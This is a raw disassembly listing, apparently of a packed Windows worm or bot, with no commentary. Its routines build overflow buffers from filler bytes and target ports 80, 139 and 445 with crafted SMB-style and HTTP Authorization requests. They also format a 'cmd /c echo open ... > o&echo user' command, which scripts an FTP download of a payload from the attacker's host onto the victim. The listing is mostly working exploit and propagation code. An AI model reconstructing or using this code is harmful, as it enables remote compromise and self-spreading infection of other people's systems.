; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C9A5 proc near ; CODE XREF: sub_40CADB+89�p
; sub_40CADB+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset dword_4CB50C
call sub_40C8AB
lea ecx, [ebp+var_8]
call sub_40C919
mov eax, [ebp+var_4]
inc eax
push eax
call sub_41B4D5
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40C9DF
xor al, al
jmp short loc_40CA1B
; ---------------------------------------------------------------------------
loc_40C9DF: ; CODE XREF: sub_40C9A5+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_41B590
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_41C310
add esp, 18h
mov ecx, esi
call sub_40C900
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_40C900
mov al, 1
loc_40CA1B: ; CODE XREF: sub_40C9A5+38�j
pop edi
pop esi
leave
retn
sub_40C9A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA1F proc near ; CODE XREF: sub_40CA53+14�p
; sub_40CA70+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_40C8AB
mov ecx, esi
call sub_40C900
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_40CA1F endp
; =============== S U B R O U T I N E =======================================
sub_40CA53 proc near ; CODE XREF: sub_40CADB+F0�p
; sub_40CADB+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_41AFE0
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_40CA1F
pop esi
retn 4
sub_40CA53 endp
; =============== S U B R O U T I N E =======================================
sub_40CA70 proc near ; CODE XREF: sub_40CABC+B�p
; sub_40CADB+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40CA1F
retn 8
sub_40CA70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA80 proc near ; CODE XREF: sub_40CABC+16�p
; sub_40CADB+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40C919
test al, al
jz short loc_40CAB9
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_42CFE4
call sub_40C8AB
mov ecx, esi
call sub_40C900
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40CAB9: ; CODE XREF: sub_40CA80+F�j
pop esi
leave
retn
sub_40CA80 endp
; =============== S U B R O U T I N E =======================================
sub_40CABC proc near ; CODE XREF: sub_40CADB+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40CA70
test al, al
jz short loc_40CAD7
mov ecx, esi
call sub_40CA80
loc_40CAD7: ; CODE XREF: sub_40CABC+12�j
pop esi
retn 8
sub_40CABC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CADB proc near ; CODE XREF: UPX0:0040D362�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_40C867
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_40CE2F
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_40CE2F
push esi
lea ecx, [ebp+var_30]
call sub_40C867
lea ecx, [ebp+var_20]
call sub_40C867
lea ecx, [ebp+var_50]
call sub_40C867
lea ecx, [ebp+var_18]
call sub_40C867
lea ecx, [ebp+var_40]
call sub_40C867
lea ecx, [ebp+var_38]
call sub_40C867
lea ecx, [ebp+var_28]
call sub_40C867
push 4
push offset dword_432338
lea ecx, [ebp+var_30]
call sub_40CA1F
push 3
push offset dword_432340
lea ecx, [ebp+var_30]
call sub_40CA1F
lea ecx, [ebp+var_30]
call sub_40C9A5
lea ecx, [ebp+var_30]
call sub_40CA80
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_41B590
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset aRbrbrbrb ; "BBBB"
call sub_40CA1F
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_40CA1F
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_40CA1F
lea ecx, [ebp+var_20]
call sub_40C9A5
push offset loc_4326BC
lea ecx, [ebp+var_50]
call sub_40CA53
lea ecx, [ebp+var_50]
call sub_40C9A5
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_40C871
lea ecx, [ebp+var_58]
call sub_40C9A5
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_40CABC
lea ecx, [ebp+var_58]
call sub_40C900
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_41B590
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_40CA53
push 4
push offset dword_432344
lea ecx, [ebp+var_18]
call sub_40CA1F
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_40CA1F
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_40CA1F
lea ecx, [ebp+var_18]
call sub_40C9A5
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_40CA70
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_40CA70
lea ecx, [ebp+var_40]
call sub_40CA80
lea ecx, [ebp+var_18]
call sub_40C900
lea ecx, [ebp+var_50]
call sub_40C900
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_40CA70
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_40CA70
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_40CA70
lea ecx, [ebp+var_38]
call sub_40CA80
lea ecx, [ebp+var_20]
call sub_40C900
lea ecx, [ebp+var_30]
call sub_40C900
lea ecx, [ebp+var_40]
call sub_40C900
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_40CA1F
lea ecx, [ebp+var_28]
call sub_40C9A5
push 2
push offset dword_4326B0
lea ecx, [ebp+var_28]
call sub_40CA1F
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_40CA70
lea ecx, [ebp+var_28]
call sub_40CA80
lea ecx, [ebp+var_38]
call sub_40C900
lea ecx, [ebp+var_10]
call sub_40C867
lea ecx, [ebp+var_8]
call sub_40C867
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_40CA70
lea ecx, [ebp+var_10]
call sub_40C919
lea ecx, [ebp+var_28]
call sub_40C900
push offset dword_4326AC
lea ecx, [ebp+var_8]
call sub_40CA53
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40CA70
lea ecx, [ebp+var_8]
call sub_40C919
lea ecx, [ebp+var_10]
call sub_40C900
push offset dword_4326A8
lea ecx, [ebp+var_10]
call sub_40CA53
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_40CA70
lea ecx, [ebp+var_10]
call sub_40C919
lea ecx, [ebp+var_8]
call sub_40C900
push offset dword_43269C
lea ecx, [ebp+var_8]
call sub_40CA53
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40CA70
lea ecx, [ebp+var_8]
call sub_40C919
lea ecx, [ebp+var_10]
call sub_40C900
push (offset loc_432697+1)
lea ecx, [ebp+var_48]
call sub_40CA53
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_40CA70
lea ecx, [ebp+var_8]
call sub_40C900
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop esi
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
jmp short loc_40CE3D
; ---------------------------------------------------------------------------
loc_40CE2F: ; CODE XREF: sub_40CADB+1B�j
; sub_40CADB+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
loc_40CE3D: ; CODE XREF: sub_40CADB+352�j
pop edi
pop ebx
leave
retn
sub_40CADB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CE41 proc near ; CODE XREF: sub_40CF05+A1�p
; sub_40CF05+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
push edi
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call dword_427228 ; select
cmp eax, edi
jnz short loc_40CEA8
lea eax, [ebp+var_10C]
push eax
push esi
call sub_426756 ; __WSAFDIsSet
test eax, eax
jnz short loc_40CEAC
loc_40CEA8: ; CODE XREF: sub_40CE41+54�j
xor eax, eax
jmp short loc_40CEBC
; ---------------------------------------------------------------------------
loc_40CEAC: ; CODE XREF: sub_40CE41+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call ds:dword_4CB66C ; recv
loc_40CEBC: ; CODE XREF: sub_40CE41+69�j
pop edi
pop esi
leave
retn
sub_40CE41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CEC0 proc near ; CODE XREF: sub_40CF05+81�p
; sub_40CF05+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call ds:dword_4CB650 ; htonl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call ds:dword_4CB6A4 ; send
cmp eax, 4
jz short loc_40CEEA
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40CEEA: ; CODE XREF: sub_40CEC0+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4CB6A4 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_40CEC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF05 proc near ; CODE XREF: sub_40CFDF+48�p
; UPX0:0040D453�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_41B4D5
mov esi, eax
pop ecx
test esi, esi
jnz short loc_40CF2E
xor al, al
jmp loc_40CFDA
; ---------------------------------------------------------------------------
loc_40CF2E: ; CODE XREF: sub_40CF05+20�j
push ebx
push 0
push esi
call sub_41B590
push 2Fh
push offset dword_4323D4
push esi
call sub_41C310
push 8
lea eax, [esi+31h]
push offset dword_432404
push eax
mov [esi+2Fh], di
call sub_41C310
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_41C310
push 6
add ebx, edi
push offset dword_4CE36C
push ebx
call sub_41C310
mov ebx, [ebp+arg_0]
push 85h
push offset dword_43234C
push ebx
call sub_40CEC0
add esp, 48h
test al, al
jnz short loc_40CF96
loc_40CF92: ; CODE XREF: sub_40CF05+B5�j
xor bl, bl
jmp short loc_40CFD1
; ---------------------------------------------------------------------------
loc_40CF96: ; CODE XREF: sub_40CF05+8B�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_40CE41
push [ebp+var_4]
push esi
push ebx
call sub_40CEC0
add esp, 1Ch
test al, al
jz short loc_40CF92
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_40CE41
add esp, 10h
mov bl, 1
loc_40CFD1: ; CODE XREF: sub_40CF05+8F�j
push esi
call sub_41B0B1
pop ecx
mov al, bl
loc_40CFDA: ; CODE XREF: sub_40CF05+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_40CF05 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CFDF proc near ; CODE XREF: UPX0:0040D439�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_432410
push [ebp+arg_0]
call dword_427224 ; send
cmp eax, 48h
jnz short loc_40D01A
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_40CE41
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_40D01A
cmp [ebp+var_20], 82h
jz short loc_40D01E
loc_40D01A: ; CODE XREF: sub_40CFDF+1B�j
; sub_40CFDF+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40D01E: ; CODE XREF: sub_40CFDF+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CF05
add esp, 0Ch
leave
retn
sub_40CFDF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D031 proc near ; CODE XREF: sub_40D07D+2D�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul dbl_427688
call sub_41C798
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul dbl_427680
fstp [esp+10h+var_10]
call sub_41C679
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_41C798
inc eax
leave
retn
sub_40D031 endp
; =============== S U B R O U T I N E =======================================
sub_40D07D proc near ; CODE XREF: sub_40D21F+24�p
var_40 = qword ptr -40h
mov eax, offset loc_426DF7
call sub_41CC64
sub esp, 2Ch
mov al, [ebp+13h]
push ebx
push esi
push edi
xor edi, edi
lea ecx, [ebp-38h]
push edi
mov [ebp-20h], edi
mov [ebp-38h], al
call sub_40D6B4
push 1
pop ebx
push dword ptr [ebp+10h]
mov [ebp-4], ebx
call sub_40D031
cmp [ebp-2Ch], eax
pop ecx
jnb short loc_40D0BF
push edi
push eax
lea ecx, [ebp-38h]
call sub_40D62F
loc_40D0BF: ; CODE XREF: sub_40D07D+36�j
cmp [ebp+10h], edi
mov [ebp-18h], edi
jbe loc_40D1DC
mov ebx, [ebp+10h]
loc_40D0CE: ; CODE XREF: sub_40D07D+156�j
cmp dword ptr [ebp+10h], 3
jb short loc_40D0D8
push 3
jmp short loc_40D0EA
; ---------------------------------------------------------------------------
loc_40D0D8: ; CODE XREF: sub_40D07D+55�j
cmp dword ptr [ebp+10h], 2
jnz short loc_40D0E2
push 2
jmp short loc_40D0EA
; ---------------------------------------------------------------------------
loc_40D0E2: ; CODE XREF: sub_40D07D+5F�j
cmp dword ptr [ebp+10h], 1
jnz short loc_40D0EB
push 1
loc_40D0EA: ; CODE XREF: sub_40D07D+59�j
; sub_40D07D+63�j
pop ebx
loc_40D0EB: ; CODE XREF: sub_40D07D+69�j
mov [ebp-28h], ebx
mov [ebp-24h], edi
fild qword ptr [ebp-28h]
push ecx
push ecx ; double
fmul dbl_427698
fstp [esp+40h+var_40]
call sub_41C7BF
pop ecx
pop ecx
call sub_41C798
cmp ebx, edi
mov [ebp-1Ch], eax
jbe short loc_40D12A
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp-10h]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_40D12A: ; CODE XREF: sub_40D07D+93�j
mov cl, [ebp-10h]
mov dl, [ebp-10h]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp-14h], cl
mov cl, [ebp-0Fh]
sar cl, 4
and cl, 0Fh
add [ebp+0Ch], ebx
shl dl, 4
add cl, dl
mov dl, [ebp-0Fh]
mov [ebp-13h], cl
mov cl, [ebp-0Eh]
sar cl, 6
and dl, 0Fh
sub [ebp+10h], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp-12h], cl
mov cl, [ebp-0Eh]
and cl, 3Fh
cmp eax, edi
mov [ebp-11h], cl
jbe short loc_40D198
add [ebp-18h], eax
loc_40D17C: ; CODE XREF: sub_40D07D+119�j
movsx eax, byte ptr [ebp+esi-14h]
lea ecx, [ebp-38h]
mov al, byte_43245C[eax]
push eax
push 1
call sub_40D4B1
inc esi
cmp esi, [ebp-1Ch]
jb short loc_40D17C
loc_40D198: ; CODE XREF: sub_40D07D+FA�j
cmp dword ptr [ebp-18h], 48h
jb short loc_40D1B6
push dword ptr [ebp+14h]
call sub_41AFE0
pop ecx
push eax
lea ecx, [ebp-38h]
push dword ptr [ebp+14h]
call sub_40D50A
mov [ebp-18h], edi
loc_40D1B6: ; CODE XREF: sub_40D07D+11F�j
push 4
pop esi
cmp [ebp-1Ch], esi
jnb short loc_40D1D0
sub esi, [ebp-1Ch]
loc_40D1C1: ; CODE XREF: sub_40D07D+151�j
push 3Dh
push 1
lea ecx, [ebp-38h]
call sub_40D4B1
dec esi
jnz short loc_40D1C1
loc_40D1D0: ; CODE XREF: sub_40D07D+13F�j
cmp [ebp+10h], edi
ja loc_40D0CE
push 1
pop ebx
loc_40D1DC: ; CODE XREF: sub_40D07D+48�j
mov esi, [ebp+8]
mov al, [ebp-38h]
push edi
mov ecx, esi
mov [esi], al
call sub_40D6B4
push dword_427690
lea eax, [ebp-38h]
mov ecx, esi
push edi
push eax
call sub_40D561
mov [ebp-20h], ebx
and byte ptr [ebp-4], 0
push ebx
lea ecx, [ebp-38h]
call sub_40D6B4
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40D07D endp
; =============== S U B R O U T I N E =======================================
sub_40D21F proc near ; CODE XREF: UPX0:0040D41C�p
mov eax, offset loc_426E14
call sub_41CC64
sub esp, 10h
push ebx
push esi
push edi
push offset byte_43D808
lea eax, [ebp-1Ch]
push dword ptr [ebp+10h]
xor ebx, ebx
mov [ebp-4], ebx
push dword ptr [ebp+0Ch]
push eax
call sub_40D07D
mov eax, [ebp+1Ch]
mov ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
lea esi, [ecx+eax+36h]
push esi
call sub_41B4D5
mov edi, eax
add esp, 14h
cmp edi, ebx
jnz short loc_40D269
xor bl, bl
jmp short loc_40D2AD
; ---------------------------------------------------------------------------
loc_40D269: ; CODE XREF: sub_40D21F+44�j
mov ecx, [ebp-18h]
mov eax, offset dword_4276A0
cmp ecx, ebx
jnz short loc_40D277
mov ecx, eax
loc_40D277: ; CODE XREF: sub_40D21F+54�j
cmp [ebp+18h], ebx
jz short loc_40D27F
mov eax, [ebp+18h]
loc_40D27F: ; CODE XREF: sub_40D21F+5B�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi
push edi
call sub_41B980
add esp, 14h
push ebx
push esi
push edi
push dword ptr [ebp+8]
call ds:dword_4CB6A4 ; send
cmp eax, esi
jz short loc_40D2A4
xor bl, bl
jmp short loc_40D2A6
; ---------------------------------------------------------------------------
loc_40D2A4: ; CODE XREF: sub_40D21F+7F�j
mov bl, 1
loc_40D2A6: ; CODE XREF: sub_40D21F+83�j
push edi
call sub_41B0B1
pop ecx
loc_40D2AD: ; CODE XREF: sub_40D21F+48�j
and byte ptr [ebp-4], 0
push 1
lea ecx, [ebp-1Ch]
call sub_40D6B4
or dword ptr [ebp-4], 0FFFFFFFFh
push 1
lea ecx, [ebp+14h]
call sub_40D6B4
mov ecx, [ebp-0Ch]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40D21F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 420h
and byte ptr [ebp-420h], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-41Fh]
push 8Fh
rep stosd
stosw
stosb
lea eax, [ebp-420h]
push offset sub_432608
push eax
call sub_41C310
add esp, 0Ch
mov eax, offset byte_429110
push eax
push eax
movzx eax, word ptr ds:dword_4CB390
push eax
push dword ptr [ebp+8]
call sub_40AC10
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d > o&echo user 1 "...
lea eax, [ebp-391h]
push 400h
push eax
call sub_41B980
add eax, 90h
push eax
lea eax, [ebp-420h]
push eax
push 164h
lea eax, [ebp-8]
push offset sub_4324A0
push eax
call sub_40CADB
xor esi, esi
add esp, 30h
cmp [ebp-4], esi
jnz short loc_40D378
xor eax, eax
jmp loc_40D4A4
; ---------------------------------------------------------------------------
loc_40D378: ; CODE XREF: UPX0:0040D36F�j
mov [ebp-0Ch], esi
loc_40D37B: ; CODE XREF: UPX0:0040D47B�j
test esi, esi
jnz loc_40D481
push 6
push 1
push 2
call dword_427220 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40D469
xor eax, eax
lea edi, [ebp-1Ah]
stosd
push dword ptr [ebp+0A8h]
stosd
stosd
stosw
mov word ptr [ebp-1Ch], 2
call ds:dword_4CB654 ; htons
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call ds:dword_4CB694 ; inet_addr
mov [ebp-18h], eax
lea eax, [ebp-1Ch]
push 10h
push eax
push ebx
call ds:dword_4CB5FC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40D45E
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_40D426
mov al, [ebp+0C3h]
sub esp, 10h
mov esi, esp
mov [ebp-20h], esp
push 0
mov ecx, esi
mov [esi], al
call sub_40D6B4
lea eax, [ebp+0Ch]
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+0Ch]
push eax
mov ecx, esi
call sub_40D6F0
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40D21F
add esp, 1Ch
jmp short loc_40D45B
; ---------------------------------------------------------------------------
loc_40D426: ; CODE XREF: UPX0:0040D3E4�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_40D440
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40CFDF
jmp short loc_40D458
; ---------------------------------------------------------------------------
loc_40D440: ; CODE XREF: UPX0:0040D430�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_40D45E
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40CF05
loc_40D458: ; CODE XREF: UPX0:0040D43E�j
add esp, 0Ch
loc_40D45B: ; CODE XREF: UPX0:0040D424�j
movzx esi, al
loc_40D45E: ; CODE XREF: UPX0:0040D3D7�j
; UPX0:0040D44A�j
push ebx
call ds:dword_4CB6EC ; closesocket
test esi, esi
jnz short loc_40D474
loc_40D469: ; CODE XREF: UPX0:0040D394�j
push 3E8h
call dword_427078 ; Sleep
loc_40D474: ; CODE XREF: UPX0:0040D467�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 2
jl loc_40D37B
loc_40D481: ; CODE XREF: UPX0:0040D37D�j
lea ecx, [ebp-8]
call sub_40C900
test esi, esi
jz short loc_40D4A2
mov eax, [ebp+0B0h]
shl eax, 6
inc dword_431B08[eax]
lea eax, dword_431B08[eax]
loc_40D4A2: ; CODE XREF: UPX0:0040D48B�j
mov eax, esi
loc_40D4A4: ; CODE XREF: UPX0:0040D373�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426DD8
loc_40D4A9: ; CODE XREF: sub_426DD8+3�j
; UPX0:00426DF1�j ...
push 1
call sub_40D6B4
retn
; END OF FUNCTION CHUNK FOR sub_426DD8
; =============== S U B R O U T I N E =======================================
sub_40D4B1 proc near ; CODE XREF: sub_40D07D+110�p
; sub_40D07D+14B�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, dword_427690
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40D4CB
call sub_42669A
loc_40D4CB: ; CODE XREF: sub_40D4B1+13�j
test ebx, ebx
jbe short loc_40D502
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_40D62F
test al, al
jz short loc_40D502
movsx eax, [esp+0Ch+arg_4]
push ebx
push eax
mov eax, [esi+4]
add eax, [esi+8]
push eax
call sub_41B590
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_40D502: ; CODE XREF: sub_40D4B1+1C�j
; sub_40D4B1+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40D4B1 endp
; =============== S U B R O U T I N E =======================================
sub_40D50A proc near ; CODE XREF: sub_40D07D+131�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, dword_427690
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40D524
call sub_42669A
loc_40D524: ; CODE XREF: sub_40D50A+13�j
test ebx, ebx
jbe short loc_40D559
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_40D62F
test al, al
jz short loc_40D559
mov eax, [esi+8]
push ebx
push [esp+10h+arg_0]
add eax, [esi+4]
push eax
call sub_41C310
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_40D559: ; CODE XREF: sub_40D50A+1C�j
; sub_40D50A+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40D50A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D561 proc near ; CODE XREF: sub_40D07D+17C�p
; sub_4265B0+15�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
cmp [ebx+8], eax
jnb short loc_40D579
call sub_426573
loc_40D579: ; CODE XREF: sub_40D561+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_40D58B
mov esi, [ebp+arg_8]
loc_40D58B: ; CODE XREF: sub_40D561+25�j
cmp edi, ebx
jnz short loc_40D5AD
push dword_427690
add esi, ecx
mov ecx, edi
push esi
call sub_40D725
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_40D725
jmp short loc_40D626
; ---------------------------------------------------------------------------
loc_40D5AD: ; CODE XREF: sub_40D561+2C�j
test esi, esi
jbe short loc_40D5F0
cmp esi, eax
jnz short loc_40D5F0
mov eax, [ebx+4]
test eax, eax
jnz short loc_40D5C1
mov eax, offset dword_4276A0
loc_40D5C1: ; CODE XREF: sub_40D561+59�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_40D5F0
push 1
mov ecx, edi
call sub_40D6B4
mov eax, [ebx+4]
test eax, eax
